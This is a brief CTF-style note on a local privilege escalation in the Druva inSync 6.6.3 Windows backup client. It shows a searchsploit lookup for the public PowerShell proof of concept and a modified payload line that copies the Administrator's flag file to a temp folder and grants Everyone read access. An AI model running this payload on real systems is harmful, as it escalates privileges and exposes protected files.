Druva

101

Druva is a cloud-based data protection platform that provides backup, recovery, and data management services for endpoints, servers, and cloud applications. Druva inSync is the Windows endpoint backup client—an agent installed on devices to securely back up data to Druva’s cloud. Essentially, Druva inSync acts as the local software component enabling Druva’s cloud service to protect endpoint data.

Attacks

The Druva inSync 6.6.3 vulnerability is a local privilege escalation (LPE) flaw due to insecure handling of permissions or improperly protected components within the Druva inSync client software.

$ searchsploit Druva 6.6.3

Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell) | windows/local/49211.ps1

The PoC can be modified for CTF purposes:

# Modified code
$cmd = "type C:\Users\Administrator\desktop\flag.txt > C:\Windows\Temp\flag.txt && icacls C:\Windows\Temp\flag.txt /grant Everyone:R /T /C /Q"